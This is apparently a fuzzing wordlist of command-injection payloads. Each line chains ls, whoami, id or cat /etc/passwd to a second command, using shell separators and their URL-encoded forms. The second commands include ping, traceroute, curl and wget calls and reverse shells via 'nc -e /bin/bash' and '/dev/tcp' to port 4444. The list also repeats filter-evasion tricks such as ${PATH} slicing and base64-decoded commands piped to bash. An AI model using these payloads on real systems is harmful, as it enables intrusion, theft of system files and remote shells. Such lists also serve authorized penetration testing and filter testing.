id||ping -c 4 127.0.0.1
id%7c%7cping -c 4 127.0.0.1
id`ping -c 4 127.0.0.1`
id%60%60ping -c 4 127.0.0.1
id$()ping -c 4 127.0.0.1
id%24%28%29ping -c 4 127.0.0.1
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
cat /etc/passwd;ping -c 4 127.0.0.1
cat /etc/passwd%3bping -c 4 127.0.0.1
cat /etc/passwd\nping -c 4 127.0.0.1
cat /etc/passwd%0aping -c 4 127.0.0.1
cat /etc/passwd&ping -c 4 127.0.0.1
cat /etc/passwd%26ping -c 4 127.0.0.1
cat /etc/passwd|ping -c 4 127.0.0.1
cat /etc/passwd%7cping -c 4 127.0.0.1
cat /etc/passwd&&ping -c 4 127.0.0.1
cat /etc/passwd%26%26ping -c 4 127.0.0.1
cat /etc/passwd||ping -c 4 127.0.0.1
cat /etc/passwd%7c%7cping -c 4 127.0.0.1
cat /etc/passwd`ping -c 4 127.0.0.1`
cat /etc/passwd%60%60ping -c 4 127.0.0.1
cat /etc/passwd$()ping -c 4 127.0.0.1
cat /etc/passwd%24%28%29ping -c 4 127.0.0.1
echo${PATH:0:1}etc${PATH:0:1}passwd;cat /etc/passwd
echo${LS_COLORS:10:1}passwd;cat /etc/passwd
$(tr '!-}' '"-~'<<<[);cat /etc/passwd
echo -n 'cat /etc/passwd' | base64;cat /etc/passwd
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);cat /etc/passwd
ls;traceroute google.com
ls%3btraceroute google.com
ls\ntraceroute google.com
ls%0atraceroute google.com
ls&traceroute google.com
ls%26traceroute google.com
ls|traceroute google.com
ls%7ctrraceroute google.com
ls&&traceroute google.com
ls%26%26traceroute google.com
ls||traceroute google.com
ls%7c%7ctraceroute google.com
ls`traceroute google.com`
ls%60%60traceroute google.com
ls$()traceroute google.com
ls%24%28%29traceroute google.com
echo${PATH:0:1}etc${PATH:0:1}passwd;traceroute google.com
echo${LS_COLORS:10:1}passwd;traceroute google.com
$(tr '!-}' '"-~'<<<[);traceroute google.com
echo -n 'cat /etc/passwd' | base64;traceroute google.com
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);traceroute google.com
whoami;traceroute google.com
whoami%3btraceroute google.com
whoami\ntraceroute google.com
whoami%0atraceroute google.com
whoami&traceroute google.com
whoami%26traceroute google.com
whoami|traceroute google.com
whoami%7ctraceroute google.com
whoami&&traceroute google.com
whoami%26%26traceroute google.com
whoami||traceroute google.com
whoami%7c%7ctraceroute google.com
whoami`traceroute google.com`
whoami%60%60traceroute google.com
whoami$()traceroute google.com
whoami%24%28%29traceroute google.com
echo${PATH:0:1}etc${PATH:0:1}passwd;whoami
echo${LS_COLORS:10:1}passwd;whoami
$(tr '!-}' '"-~'<<<[);whoami
echo -n 'cat /etc/passwd' | base64;whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);whoami
id;traceroute google.com
id%3btraceroute google.com
id\ntraceroute google.com
id%0atraceroute google.com
id&traceroute google.com
id%26traceroute google.com
id|traceroute google.com
id%7ctraceroute google.com
id&&traceroute google.com
id%26%26traceroute google.com
id||traceroute google.com
id%7c%7ctraceroute google.com
id`traceroute google.com`
id%60%60traceroute google.com
id$()traceroute google.com
id%24%28%29traceroute google.com
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
cat /etc/passwd;traceroute google.com
cat /etc/passwd%3btraceroute google.com
cat /etc/passwd\ntraceroute google.com
cat /etc/passwd%0atraceroute google.com
cat /etc/passwd&traceroute google.com
cat /etc/passwd%26traceroute google.com
cat /etc/passwd|traceroute google.com
cat /etc/passwd%7ctraceroute google.com
cat /etc/passwd&&traceroute google.com
cat /etc/passwd%26%26traceroute google.com
cat /etc/passwd||traceroute google.com
cat /etc/passwd%7c%7ctraceroute google.com
cat /etc/passwd`traceroute google.com`
cat /etc/passwd%60%60traceroute google.com
cat /etc/passwd$()traceroute google.com
cat /etc/passwd%24%28%29traceroute google.com
echo${PATH:0:1}etc${PATH:0:1}passwd;cat /etc/passwd
echo${LS_COLORS:10:1}passwd;cat /etc/passwd
$(tr '!-}' '"-~'<<<[);cat /etc/passwd
echo -n 'cat /etc/passwd' | base64;cat /etc/passwd
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);cat /etc/passwd
ls;curl http://example.com
ls%3bcurl http://example.com
ls\ncurl http://example.com
ls%0acurl http://example.com
ls&curl http://example.com
ls%26curl http://example.com
ls|curl http://example.com
ls%7ccurl http://example.com
ls&&curl http://example.com
ls%26%26curl http://example.com
ls||curl http://example.com
ls%7c%7ccurl http://example.com
ls`curl http://example.com`
ls%60%60curl http://example.com
ls$()curl http://example.com
ls%24%28%29curl http://example.com
echo${PATH:0:1}etc${PATH:0:1}passwd;curl http://example.com
echo${LS_COLORS:10:1}passwd;curl http://example.com
$(tr '!-}' '"-~'<<<[);curl http://example.com
echo -n 'cat /etc/passwd' | base64;curl http://example.com
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);curl http://example.com
whoami;curl http://example.com
whoami%3bcurl http://example.com
whoami\ncurl http://example.com
whoami%0acurl http://example.com
whoami&curl http://example.com
whoami%26curl http://example.com
whoami|curl http://example.com
whoami%7ccurl http://example.com
whoami&&curl http://example.com
whoami%26%26curl http://example.com
whoami||curl http://example.com
whoami%7c%7ccurl http://example.com
whoami`curl http://example.com`
whoami%60%60curl http://example.com
whoami$()curl http://example.com
whoami%24%28%29curl http://example.com
echo${PATH:0:1}etc${PATH:0:1}passwd;whoami
echo${LS_COLORS:10:1}passwd;whoami
$(tr '!-}' '"-~'<<<[);whoami
echo -n 'cat /etc/passwd' | base64;whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);whoami
id;curl http://example.com
id%3bcurl http://example.com
id\ncurl http://example.com
id%0acurl http://example.com
id&curl http://example.com
id%26curl http://example.com
id|curl http://example.com
id%7ccurl http://example.com
id&&curl http://example.com
id%26%26curl http://example.com
id||curl http://example.com
id%7c%7ccurl http://example.com
id`curl http://example.com`
id%60%60curl http://example.com
id$()curl http://example.com
id%24%28%29curl http://example.com
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
cat /etc/passwd;curl http://example.com
cat /etc/passwd%3bcurl http://example.com
cat /etc/passwd\ncurl http://example.com
cat /etc/passwd%0acurl http://example.com
cat /etc/passwd&curl http://example.com
cat /etc/passwd%26curl http://example.com
cat /etc/passwd|curl http://example.com
cat /etc/passwd%7ccurl http://example.com
cat /etc/passwd&&curl http://example.com
cat /etc/passwd%26%26curl http://example.com
cat /etc/passwd||curl http://example.com
cat /etc/passwd%7c%7ccurl http://example.com
cat /etc/passwd`curl http://example.com`
cat /etc/passwd%60%60curl http://example.com
cat /etc/passwd$()curl http://example.com
cat /etc/passwd%24%28%29curl http://example.com
echo${PATH:0:1}etc${PATH:0:1}passwd;cat /etc/passwd
echo${LS_COLORS:10:1}passwd;cat /etc/passwd
$(tr '!-}' '"-~'<<<[);cat /etc/passwd
echo -n 'cat /etc/passwd' | base64;cat /etc/passwd
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);cat /etc/passwd
ls;wget http://example.com
ls%3bwget http://example.com
ls\nwget http://example.com
ls%0awget http://example.com
ls&wget http://example.com
ls%26wget http://example.com
ls|wget http://example.com
ls%7cwget http://example.com
ls&&wget http://example.com
ls%26%26wget http://example.com
ls||wget http://example.com
ls%7c%7cwget http://example.com
ls`wget http://example.com`
ls%60%60wget http://example.com
ls$()wget http://example.com
ls%24%28%29wget http://example.com
echo${PATH:0:1}etc${PATH:0:1}passwd;wget http://example.com
echo${LS_COLORS:10:1}passwd;wget http://example.com
$(tr '!-}' '"-~'<<<[);wget http://example.com
echo -n 'cat /etc/passwd' | base64;wget http://example.com
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);wget http://example.com
whoami;wget http://example.com
whoami%3bwget http://example.com
whoami\nwget http://example.com
whoami%0awget http://example.com
whoami&wget http://example.com
whoami%26wget http://example.com
whoami|wget http://example.com
whoami%7cwget http://example.com
whoami&&wget http://example.com
whoami%26%26wget http://example.com
whoami||wget http://example.com
whoami%7c%7cwget http://example.com
whoami`wget http://example.com`
whoami%60%60wget http://example.com
whoami$()wget http://example.com
whoami%24%28%29wget http://example.com
echo${PATH:0:1}etc${PATH:0:1}passwd;whoami
echo${LS_COLORS:10:1}passwd;whoami
$(tr '!-}' '"-~'<<<[);whoami
echo -n 'cat /etc/passwd' | base64;whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);whoami
id;wget http://example.com
id%3bwget http://example.com
id\nwget http://example.com
id%0awget http://example.com
id&wget http://example.com
id%26wget http://example.com
id|wget http://example.com
id%7cwget http://example.com
id&&wget http://example.com
id%26%26wget http://example.com
id||wget http://example.com
id%7c%7cwget http://example.com
id`wget http://example.com`
id%60%60wget http://example.com
id$()wget http://example.com
id%24%28%29wget http://example.com
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
cat /etc/passwd;wget http://example.com
cat /etc/passwd%3bwget http://example.com
cat /etc/passwd\nwget http://example.com
cat /etc/passwd%0awget http://example.com
cat /etc/passwd&wget http://example.com
cat /etc/passwd%26wget http://example.com
cat /etc/passwd|wget http://example.com
cat /etc/passwd%7cwget http://example.com
cat /etc/passwd&&wget http://example.com
cat /etc/passwd%26%26wget http://example.com
cat /etc/passwd||wget http://example.com
cat /etc/passwd%7c%7cwget http://example.com
cat /etc/passwd`wget http://example.com`
cat /etc/passwd%60%60wget http://example.com
cat /etc/passwd$()wget http://example.com
cat /etc/passwd%24%28%29wget http://example.com
echo${PATH:0:1}etc${PATH:0:1}passwd;cat /etc/passwd
echo${LS_COLORS:10:1}passwd;cat /etc/passwd
$(tr '!-}' '"-~'<<<[);cat /etc/passwd
echo -n 'cat /etc/passwd' | base64;cat /etc/passwd
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);cat /etc/passwd
ls;nc -e /bin/bash 127.0.0.1 4444
ls%3bnc -e /bin/bash 127.0.0.1 4444
ls\nnc -e /bin/bash 127.0.0.1 4444
ls%0anc -e /bin/bash 127.0.0.1 4444
ls&nc -e /bin/bash 127.0.0.1 4444
ls%26nc -e /bin/bash 127.0.0.1 4444
ls|nc -e /bin/bash 127.0.0.1 4444
ls%7cnc -e /bin/bash 127.0.0.1 4444
ls&&nc -e /bin/bash 127.0.0.1 4444
ls%26%26nc -e /bin/bash 127.0.0.1 4444
ls||nc -e /bin/bash 127.0.0.1 4444
ls%7c%7cnc -e /bin/bash 127.0.0.1 4444
ls`nc -e /bin/bash 127.0.0.1 4444`
ls%60%60nc -e /bin/bash 127.0.0.1 4444
ls$()nc -e /bin/bash 127.0.0.1 4444
ls%24%28%29nc -e /bin/bash 127.0.0.1 4444
echo${PATH:0:1}etc${PATH:0:1}passwd;nc -e /bin/bash 127.0.0.1 4444
echo${LS_COLORS:10:1}passwd;nc -e /bin/bash 127.0.0.1 4444
$(tr '!-}' '"-~'<<<[);nc -e /bin/bash 127.0.0.1 4444
echo -n 'cat /etc/passwd' | base64;nc -e /bin/bash 127.0.0.1 4444
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);nc -e /bin/bash 127.0.0.1 4444
whoami;nc -e /bin/bash 127.0.0.1 4444
whoami%3bnc -e /bin/bash 127.0.0.1 4444
whoami\nnc -e /bin/bash 127.0.0.1 4444
whoami%0anc -e /bin/bash 127.0.0.1 4444
whoami&nc -e /bin/bash 127.0.0.1 4444
whoami%26nc -e /bin/bash 127.0.0.1 4444
whoami|nc -e /bin/bash 127.0.0.1 4444
whoami%7cnc -e /bin/bash 127.0.0.1 4444
whoami&&nc -e /bin/bash 127.0.0.1 4444
whoami%26%26nc -e /bin/bash 127.0.0.1 4444
whoami||nc -e /bin/bash 127.0.0.1 4444
whoami%7c%7cnc -e /bin/bash 127.0.0.1 4444
whoami`nc -e /bin/bash 127.0.0.1 4444`
whoami%60%60nc -e /bin/bash 127.0.0.1 4444
whoami$()nc -e /bin/bash 127.0.0.1 4444
whoami%24%28%29nc -e /bin/bash 127.0.0.1 4444
echo${PATH:0:1}etc${PATH:0:1}passwd;whoami
echo${LS_COLORS:10:1}passwd;whoami
$(tr '!-}' '"-~'<<<[);whoami
echo -n 'cat /etc/passwd' | base64;whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);whoami
id;nc -e /bin/bash 127.0.0.1 4444
id%3bnc -e /bin/bash 127.0.0.1 4444
id\nnc -e /bin/bash 127.0.0.1 4444
id%0anc -e /bin/bash 127.0.0.1 4444
id&nc -e /bin/bash 127.0.0.1 4444
id%26nc -e /bin/bash 127.0.0.1 4444
id|nc -e /bin/bash 127.0.0.1 4444
id%7cnc -e /bin/bash 127.0.0.1 4444
id&&nc -e /bin/bash 127.0.0.1 4444
id%26%26nc -e /bin/bash 127.0.0.1 4444
id||nc -e /bin/bash 127.0.0.1 4444
id%7c%7cnc -e /bin/bash 127.0.0.1 4444
id`nc -e /bin/bash 127.0.0.1 4444`
id%60%60nc -e /bin/bash 127.0.0.1 4444
id$()nc -e /bin/bash 127.0.0.1 4444
id%24%28%29nc -e /bin/bash 127.0.0.1 4444
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
cat /etc/passwd;nc -e /bin/bash 127.0.0.1 4444
cat /etc/passwd%3bnc -e /bin/bash 127.0.0.1 4444
cat /etc/passwd\nnc -e /bin/bash 127.0.0.1 4444
cat /etc/passwd%0anc -e /bin/bash 127.0.0.1 4444
cat /etc/passwd&nc -e /bin/bash 127.0.0.1 4444
cat /etc/passwd%26nc -e /bin/bash 127.0.0.1 4444
cat /etc/passwd|nc -e /bin/bash 127.0.0.1 4444
cat /etc/passwd%7cnc -e /bin/bash 127.0.0.1 4444
cat /etc/passwd&&nc -e /bin/bash 127.0.0.1 4444
cat /etc/passwd%26%26nc -e /bin/bash 127.0.0.1 4444
cat /etc/passwd||nc -e /bin/bash 127.0.0.1 4444
cat /etc/passwd%7c%7cnc -e /bin/bash 127.0.0.1 4444
cat /etc/passwd`nc -e /bin/bash 127.0.0.1 4444`
cat /etc/passwd%60%60nc -e /bin/bash 127.0.0.1 4444
cat /etc/passwd$()nc -e /bin/bash 127.0.0.1 4444
cat /etc/passwd%24%28%29nc -e /bin/bash 127.0.0.1 4444
echo${PATH:0:1}etc${PATH:0:1}passwd;cat /etc/passwd
echo${LS_COLORS:10:1}passwd;cat /etc/passwd
$(tr '!-}' '"-~'<<<[);cat /etc/passwd
echo -n 'cat /etc/passwd' | base64;cat /etc/passwd
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);cat /etc/passwd
ls;sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
ls%3bsh -i >& /dev/tcp/127.0.0.1/4444 0>&1
ls\nsh -i >& /dev/tcp/127.0.0.1/4444 0>&1
ls%0ash -i >& /dev/tcp/127.0.0.1/4444 0>&1
ls&sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
ls%26sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
ls|sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
ls%7csh -i >& /dev/tcp/127.0.0.1/4444 0>&1
ls&&sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
ls%26%26sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
ls||sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
ls%7c%7csh -i >& /dev/tcp/127.0.0.1/4444 0>&1
ls`sh -i >& /dev/tcp/127.0.0.1/4444 0>&1`
ls%60%60sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
ls$()sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
ls%24%28%29sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
echo${PATH:0:1}etc${PATH:0:1}passwd;sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
echo${LS_COLORS:10:1}passwd;sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
$(tr '!-}' '"-~'<<<[);sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
echo -n 'cat /etc/passwd' | base64;sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
whoami;sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
whoami%3bsh -i >& /dev/tcp/127.0.0.1/4444 0>&1
whoami\nsh -i >& /dev/tcp/127.0.0.1/4444 0>&1
whoami%0ash -i >& /dev/tcp/127.0.0.1/4444 0>&1
whoami&sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
whoami%26sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
whoami|sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
whoami%7csh -i >& /dev/tcp/127.0.0.1/4444 0>&1
whoami&&sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
whoami%26%26sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
whoami||sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
whoami%7c%7csh -i >& /dev/tcp/127.0.0.1/4444 0>&1
whoami`sh -i >& /dev/tcp/127.0.0.1/4444 0>&1`
whoami%60%60sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
whoami$()sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
whoami%24%28%29sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
echo${PATH:0:1}etc${PATH:0:1}passwd;whoami
echo${LS_COLORS:10:1}passwd;whoami
$(tr '!-}' '"-~'<<<[);whoami
echo -n 'cat /etc/passwd' | base64;whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);whoami
id;sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
id%3bsh -i >& /dev/tcp/127.0.0.1/4444 0>&1
id\nsh -i >& /dev/tcp/127.0.0.1/4444 0>&1
id%0ash -i >& /dev/tcp/127.0.0.1/4444 0>&1
id&sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
id%26sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
id|sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
id%7csh -i >& /dev/tcp/127.0.0.1/4444 0>&1
id&&sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
id%26%26sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
id||sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
id%7c%7csh -i >& /dev/tcp/127.0.0.1/4444 0>&1
id`sh -i >& /dev/tcp/127.0.0.1/4444 0>&1`
id%60%60sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
id$()sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
id%24%28%29sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
cat /etc/passwd;sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
cat /etc/passwd%3bsh -i >& /dev/tcp/127.0.0.1/4444 0>&1
cat /etc/passwd\nsh -i >& /dev/tcp/127.0.0.1/4444 0>&1
cat /etc/passwd%0ash -i >& /dev/tcp/127.0.0.1/4444 0>&1
cat /etc/passwd&sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
cat /etc/passwd%26sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
cat /etc/passwd|sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
cat /etc/passwd%7csh -i >& /dev/tcp/127.0.0.1/4444 0>&1
cat /etc/passwd&&sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
cat /etc/passwd%26%26sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
cat /etc/passwd||sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
cat /etc/passwd%7c%7csh -i >& /dev/tcp/127.0.0.1/4444 0>&1
cat /etc/passwd`sh -i >& /dev/tcp/127.0.0.1/4444 0>&1`
cat /etc/passwd%60%60sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
cat /etc/passwd$()sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
cat /etc/passwd%24%28%29sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
echo${PATH:0:1}etc${PATH:0:1}passwd;cat /etc/passwd
echo${LS_COLORS:10:1}passwd;cat /etc/passwd
$(tr '!-}' '"-~'<<<[);cat /etc/passwd
echo -n 'cat /etc/passwd' | base64;cat /etc/passwd
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);cat /etc/passwd
